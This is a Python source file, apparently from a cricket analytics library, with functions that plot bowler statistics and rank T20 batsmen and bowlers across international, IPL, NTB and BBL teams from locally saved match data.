# Function: getBowlerWicketDetails
# This function gets the bowler wicket
#
#
###########################################################################################
def getBowlerWicketDetails (team, name,dir="."):
'''
Description
This function gets the bowling of a bowler (overs,maidens,runs,wickets,venue, opposition)
Usage
getBowlerWicketDetails(team,name,dir=".")
Arguments
team
The team to which the bowler belongs
name
The name of the bowler
dir
The source directory of the data
Value
dataframe The dataframe of bowling performance
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMovingAverage
getTeamBowlingDetails
bowlerMeanRunsConceded
teamBowlersWicketRunsOppnAllMatches
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
'''
path = dir + '/' + team + "-BowlingDetails.csv"
bowlingDetails= pd.read_csv(path,index_col=False)
bowlerDetails = bowlingDetails.loc[bowlingDetails['bowler'].str.contains(name)]
return(bowlerDetails)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMeanEconomyRate
# This function gets the bowler mean economy rate
#
#
###########################################################################################
def bowlerMeanEconomyRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots mean economy rate and the number of overs bowled by the bowler
Usage
bowlerMeanEconomyRate(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanEconomyRate(df, name)
'''
# Count dismissals
rcParams['figure.figsize'] = 8, 5
df2=df[['bowler','overs','econrate']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean economy rate',fontsize=8)
sns.barplot(x='overs',y='econrate',data=df2)
atitle = name + "-Mean economy rate vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMeanRunsConceded
# This function gets the mean runs conceded by bowler
#
#
###########################################################################################
def bowlerMeanRunsConceded (df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots mean runs conceded by the bowler for the number of overs bowled by the bowler
Usage
bowlerMeanRunsConceded(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanRunsConceded(df, name)
'''
# Count dismissals
rcParams['figure.figsize'] = 8, 5
df2=df[['bowler','overs','runs']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean runs conceded',fontsize=8)
sns.barplot(x='overs',y='runs',data=df2)
atitle = name + "-Mean runs conceded vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMovingAverage
# This function gets the bowler moving average
#
#
###########################################################################################
def bowlerMovingAverage (df, name,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the wickets taken by the bowler over career. A loess regression fit plots the moving average of wickets taken by bowler
Usage
bowlerMovingAverage(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMeanEconomyRate
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanEconomyRate(df, name)
'''
rcParams['figure.figsize'] = 8, 5
y_av = movingaverage(df.wicket, 30)
date= pd.to_datetime(df['date'])
plt.plot(date, y_av,"b")
plt.xlabel('Date',fontsize=8)
plt.ylabel('Wickets',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Moving average of wickets"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerCumulativeAvgWickets
# This function gets the bowler cumulative average runs
#
#
###########################################################################################
def bowlerCumulativeAvgWickets(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average wickets of a bowler
Usage
bowlerCumulativeAvgWickets(df,name)
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgEconRate batsmanCumulativeStrikeRate batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerCumulativeAvgWickets(df, name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['wicket'].cumsum()/pd.Series(np.arange(1, len( df['wicket'])+1), df['wicket'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average wickets',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Cumulative Average wickets vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerCumulativeAvgEconRate
# This function gets the bowler cumulative average economy rate
#
#
###########################################################################################
def bowlerCumulativeAvgEconRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average economy rate of a bowler
Usage
bowlerCumulativeAvgEconRate(df,name)
Arguments
df
Data frame
name
Name of batsman
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgWickets batsmanCumulativeStrikeRate batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanEconomyRate(df, name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['econrate'].cumsum()/pd.Series(np.arange(1, len( df['econrate'])+1), df['econrate'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=7)
plt.ylabel('Cumulative Average economy rate',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Cumulative Average economy rate vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketPlot
# This function gets the bowler wicket plot
#
#
###########################################################################################
def bowlerWicketPlot (df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the average wickets taken by the bowler versus the number of overs bowled
Usage
bowlerWicketPlot(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMeanEconomyRate
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanEconomyRate(df, name)
'''
rcParams['figure.figsize'] = 8, 5
# Count dismissals
df2=df[['bowler','overs','wicket']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean wickets',fontsize=8)
sns.barplot(x='overs',y='wicket',data=df2)
atitle = name + "-Mean wickets vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketsAgainstOpposition
# This function gets the bowler's performance against opposition
#
#
###########################################################################################
def bowlerWicketsAgainstOpposition (df,name= "A Leg Glance", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots mean number of wickets taken by the bowler against different opposition
Usage
bowlerWicketsAgainstOpposition(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerWicketsAgainstOpposition(df, name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['bowler', 'wicket','team2']]
df2=df1.groupby('team2').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='team2', y="wicket_mean", data=df3)
plt.xticks(rotation=90,fontsize=7)
plt.xlabel('Opposition',fontsize=7)
plt.ylabel('Mean wickets',fontsize=8)
atitle=name + "-Mean wickets against opposition"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketsVenue
# This function gets the bowler wickets at venues
#
#
###########################################################################################
def bowlerWicketsVenue (df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Bowler performance at different venues
Description
This function computes and plots mean number of wickets taken by the bowler in different venues
Usage
bowlerWicketsVenue(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerWicketsVenue(df, name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['bowler', 'wicket','venue']]
df2=df1.groupby('venue').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='venue', y="wicket_mean", data=df3)
plt.xticks(rotation=90,fontsize=7)
plt.xlabel('Venue',fontsize=7)
plt.ylabel('Mean wickets',fontsize=8)
atitle=name + "-Mean wickets at different venues"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 March 2019
# Function: saveAllMatchesBetween2IntlT20s
# This function saves all the matches between 2 Intl T20 teams
#
###########################################################################################
def saveAllMatchesBetween2IntlT20s(dir1,odir="."):
'''
Saves all matches between 2 IPL teams as dataframe
Description
This function saves all matches between 2 Intl. T20 countries as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2IntlT20s(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Afghanistan","Australia","Bangladesh","Bermuda","Canada","England",
"Hong Kong","India","Ireland", "Kenya","Nepal","Netherlands",
"New Zealand", "Oman","Pakistan","Scotland","South Africa",
"Sri Lanka", "United Arab Emirates","West Indies", "Zimbabwe"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionIntlT20
# This function saves all the matches between all Intl T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionIntlT20(dir1,odir="."):
'''
Saves matches against all Intl T20 teams as dataframe and CSV for an IPL team
Description
This function saves all Intl T20 matches agaist all opposition as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionIntlT20(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Afghanistan","Australia","Bangladesh","Bermuda","Canada","England",
"Hong Kong","India","Ireland", "Kenya","Nepal","Netherlands",
"New Zealand", "Oman","Pakistan","Scotland","South Africa",
"Sri Lanka", "United Arab Emirates","West Indies", "Zimbabwe"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 March 2019
# Function: saveAllMatchesBetween2BBLTeams
# This function saves all the matches between 2 BBL Teams
#
###########################################################################################
def saveAllMatchesBetween2BBLTeams(dir1):
'''
Saves all matches between 2 BBLteams as dataframe
Description
This function saves all matches between 2 BBL T20 countries as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2BBLTeams(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Adelaide Strikers", "Brisbane Heat", "Hobart Hurricanes",
"Melbourne Renegades", "Perth Scorchers", "Sydney Sixers",
"Sydney Thunder"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionBBLT20
# This function saves all the matches between all BBL T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionBBLT20(dir1):
'''
Saves matches against all BBL T20 teams as dataframe and CSV for an IPL team
Description
This function saves all BBL T20 matches agaist all opposition as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionBBLT20(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Adelaide Strikers", "Brisbane Heat", "Hobart Hurricanes",
"Melbourne Renegades", "Perth Scorchers", "Sydney Sixers",
"Sydney Thunder"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 March 2019
# Function: saveAllMatchesBetween2NWBTeams
# This function saves all the matches between 2 NWB Teams
#
###########################################################################################
def saveAllMatchesBetween2NWBTeams(dir1):
'''
Saves all matches between 2 NWB teams as dataframe
Description
This function saves all matches between 2 NWB T20 countries as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2NWBTeams(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Derbyshire", "Durham", "Essex", "Glamorgan",
"Gloucestershire", "Hampshire", "Kent","Lancashire",
"Leicestershire", "Middlesex","Northamptonshire",
"Nottinghamshire","Somerset","Surrey","Sussex","Warwickshire",
"Worcestershire","Yorkshire"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionNWBT20
# This function saves all the matches between all NWB T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionNWBT20(dir1):
'''
Saves matches against all NWB T20 teams as dataframe and CSV for an IPL team
Description
This function saves all NWBT20 matches agaist all opposition as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionNWBT20(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Derbyshire", "Durham", "Essex", "Glamorgan",
"Gloucestershire", "Hampshire", "Kent","Lancashire",
"Leicestershire", "Middlesex","Northamptonshire",
"Nottinghamshire","Somerset","Surrey","Sussex","Warwickshire",
"Worcestershire","Yorkshire"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIntlT20Batting
# This function ranks Intl T20 batsman
#
###########################################################################################
def rankIntlT20Batting(dir1):
countries ={"India":"india", "United States of America":"usa", "Canada":"canada", "United Arab Emirates":"uae",
"Afghanistan":"afghanistan", "West Indies":"westindies","Oman":"oman","Germany":"germany",
"Namibia":"namibia","Germany":"germany","Sri Lanka":"sl","Singapore":"singapore",
"Malaysia":"malaysia","South Africa": "sa","Netherlands":"netherlands",
"Zimbabwe":"zimbabwe","Pakistan":"pakistan","Scotland":"scotland","Kuwait":"kuwait",
"New Zealand":"nz","Vanuatu":"vanuatu","Papua New Guinea": "png","Australia":"aus",
"Irelaand":"ireland","England":"england","South Korea":"sk","Japan":"japan","Bangladesh":"bangladesh",
"Nepal":"nepal","Cayman Island":"cayman","Rwanda":"rwanda","Qatar":"qatar","Botswana":"botswana",
"Rwanda":"rwanda","Uganda":"uganda","Maldives":"maldives","Fiji":"fiji","Mozambique":"mozam",
"Hong Kong":"hk","Denmark":"denmark","Norway":"norway"
}
df=pd.DataFrame()
for key in countries:
val = countries[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>40]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIntlT20Bowling
# This function ranks Intl T20 bowlers
#
###########################################################################################
def rankIntlT20Bowling(dir1):
countries ={"India":"india", "United States of America":"usa", "Canada":"canada", "United Arab Emirates":"uae",
"Afghanistan":"afghanistan", "West Indies":"westindies","Oman":"oman","Germany":"germany",
"Namibia":"namibia","Germany":"germany","Sri Lanka":"sl","Singapore":"singapore",
"Malaysia":"malaysia","South Africa": "sa","Netherlands":"netherlands",
"Zimbabwe":"zimbabwe","Pakistan":"pakistan","Scotland":"scotland","Kuwait":"kuwait",
"New Zealand":"nz","Vanuatu":"vanuatu","Papua New Guinea": "png","Australia":"aus",
"Irelaand":"ireland","England":"england","South Korea":"sk","Japan":"japan","Bangladesh":"bangladesh",
"Nepal":"nepal","Cayman Island":"cayman","Rwanda":"rwanda","Qatar":"qatar","Botswana":"botswana",
"Rwanda":"rwanda","Uganda":"uganda","Maldives":"maldives","Fiji":"fiji","Mozambique":"mozam",
"Hong Kong":"hk","Denmark":"denmark","Norway":"norway"
}
df=pd.DataFrame()
for key in countries:
val = countries[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>40]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIPLT20Batting
# This function ranks IPL T20 batsmen
#
###########################################################################################
def rankIPLT20Batting(dir1):
iplTeams ={"Chennai Super Kings":"csk","Deccan Chargers":"dc","Delhi Daredevils":"dd",
"Kings XI Punjab":"kxip", 'Kochi Tuskers Kerala':"kct","Kolkata Knight Riders":"kkr",
"Mumbai Indians":"mi", "Pune Warriors":"pw","Rajasthan Royals":"rr",
"Royal Challengers Bangalore":"rps","Sunrisers Hyderabad":"sh","Gujarat Lions":"gl",
"Rising Pune Supergiants":"rps"}
df=pd.DataFrame()
for key in iplTeams:
val = iplTeams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>40]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIPLT20Bowling
# This function ranks IPL T20 bowlers
#
###########################################################################################
def rankIPLT20Bowling(dir1):
iplTeams ={"Chennai Super Kings":"csk","Deccan Chargers":"dc","Delhi Daredevils":"dd",
"Kings XI Punjab":"kxip", 'Kochi Tuskers Kerala':"kct","Kolkata Knight Riders":"kkr",
"Mumbai Indians":"mi", "Pune Warriors":"pw","Rajasthan Royals":"rr",
"Royal Challengers Bangalore":"rps","Sunrisers Hyderabad":"sh","Gujarat Lions":"gl",
"Rising Pune Supergiants":"rps"}
df=pd.DataFrame()
for key in iplTeams:
val = iplTeams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>40]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankNTBT20Batting
# This function ranks NTB T20 batsmen
#
###########################################################################################
def rankNTBT20Batting(dir1):
ntbTeams = {"Derbyshire":"der", "Durham":"dur", "Essex":"ess", "Glamorgan":"gla",
"Gloucestershire":"glo", "Hampshire":"ham", "Kent":"ken","Lancashire":"lan",
"Leicestershire":"lei", "Middlesex":"mid","Northamptonshire":"nor",
"Nottinghamshire":"not","Somerset":"som","Surrey":"sur","Sussex":"sus","Warwickshire":"war",
"Worcestershire":"wor","Yorkshire":"yor"}
df=pd.DataFrame()
for key in ntbTeams:
val = ntbTeams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>10]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankNTBT20Bowling
# This function ranks NTB T20 bowlers
#
###########################################################################################
def rankNTBT20Bowling(dir1):
ntbTeams = {"Derbyshire":"der", "Durham":"dur", "Essex":"ess", "Glamorgan":"gla",
"Gloucestershire":"glo", "Hampshire":"ham", "Kent":"ken","Lancashire":"lan",
"Leicestershire":"lei", "Middlesex":"mid","Northamptonshire":"nor",
"Nottinghamshire":"not","Somerset":"som","Surrey":"sur","Sussex":"sus","Warwickshire":"war",
"Worcestershire":"wor","Yorkshire":"yor"}
df=pd.DataFrame()
for key in ntbTeams:
val = ntbTeams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>10]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankBBLT20Batting
# This function ranks BBL T20 batsmen
#
###########################################################################################
def rankBBLT20Batting(dir1):
bbTteams = {"Adelaide Strikers":"as", "Brisbane Heat":"bh", "Hobart Hurricanes":"hh",
"Melbourne Renegades":"mr", "Perth Scorchers":"ps", "Sydney Sixers":"ss",
"Sydney Thunder":"st"}
df=pd.DataFrame()
for key in bbTteams:
val = bbTteams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>20]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankBBLT20Bowling
# This function ranks BBL T20 bowlers
#
###########################################################################################
def rankBBLT20Bowling(dir1):
bbTteams = {"Adelaide Strikers":"as", "Brisbane Heat":"bh", "Hobart Hurricanes":"hh",
"Melbourne Renegades":"mr", "Perth Scorchers":"ps", "Sydney Sixers":"ss",
"Sydney Thunder":"st"}
df=pd.DataFrame()
for key in bbTteams:
val = bbTteams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>10]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
